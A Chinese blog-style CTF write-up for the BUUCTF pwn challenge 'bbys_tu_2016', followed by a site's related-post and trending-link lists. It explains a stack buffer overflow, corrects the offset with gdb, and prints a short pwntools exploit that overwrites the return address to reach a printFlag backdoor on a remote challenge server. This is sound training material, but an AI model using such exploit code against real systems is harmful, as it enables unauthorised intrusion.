bbys_tu_2016
2024-06-09 18:10:14
bbys_tu_2016
使用checksec
查看:
只开启了栈不可执行,看样子是栈溢出的题目。
拉进IDA中查看:
将用户输入的数据写入v4
,但是并没有限制写入的长度,存在栈溢出。
查看下字符串,发现后门函数printFlag()
:
那就直接溢出跳过来就完事。
然而事情并没有这样就结束,打了两次发现flag出不来,就用gdb调试了下:
输入的位置为0xffffd714
,ebp位置为0xffffd728
实际的距离是0x14
并不是IDA中所显示的0xc
exp:
from pwn import *#start
# r = process("../buu/bbys_tu_2016")
r = remote("node4.buuoj.cn",25049)#params
printFlag_addr = 0x804856D#attack
payload = b'M'*(0x14+4) + p32(printFlag_addr)
r.sendline(payload)r.interactive()
bbys_tu_2016相关推荐
- [BUUCTF-pwn]——bbys_tu_2016
[BUUCTF-pwn]--bbys_tu_2016 简单的栈溢出,不过竟然是esp寻址,害的孩子找了好久还是要动态调试 一般地址会误差八个字节 error exploit from pwn impo ...
- PWN-PRACTICE-BUUCTF-14
PWN-PRACTICE-BUUCTF-14 bbys_tu_2016 ciscn_2019_n_3 roarctf_2019_easy_pwn gyctf_2020_borrowstack bbys ...
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- BUUCTF bbys_tu_2016xm_2019_awd_pwn2
在家希望武汉的师傅们一切都好~~ bbys_tu_2016 这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好se ...
最新文章
- numpy之argmax()函数
- 微软宣布Azure Migrate和Site Recovery服务增强功能
- Android预优化那些事
- 3 float py 位小数 裁剪_对一个 float 精度问题的分析
- Python编程快速上手-字典
- tar中的zxvf都是什么?
- FLV视频在IIS6.0下不能播放 处理的方法
- SpringMvc 04 基于注解的映射器与适配器配置
- mysql的int多少溢出_mysql 整型(int)数字溢出在程序和数据库设计中的考虑
- JavaScript设计模式与实践--工厂模式
- 正确的座机号码格式_正确的座机号码格式
- 操作系统进程通信实验
- PHP的常用框架有哪些?
- 南京大学计算机学院刘向阳,刘向阳 南京大学计算机科学与技术系教授_光通信名人录_光邻网...
- VS Code常用快捷键
- python3 and
- 随机生成20以内加减法,5次答题并统计正确和错误题数
- 软件开发生命周期及开发模型
- mysql怎么写外键支持级联删除_MySQL外键级联删除不起作用,完全难倒
- python的秘密_Shamir秘密共享方案 (Python)
热门文章
- 3.3计算机网络(ALOHA协议 CSMA协议 令牌传递协议 频分时分波分码分)
- 银行管理系统java论文_基于java的银行账户管理系统的设计与实现毕业论文.doc
- android als传感器,环境光传感器(ALS)背光控制系统解决方案
- JavaScript——用键盘wasd控制div移动
- 软件测试面试两个月,我是如何进入奇虎360?面试总结分享给大家
- AN学习笔记,代码访问影片剪辑内部的子影片剪辑
- 常用px,pt,em换算表
- 打不开网页服务器丢失,苹果浏览器safari打不开,丢失网络
- 快递 code与快递名称
- 命令行快速切换到指定路径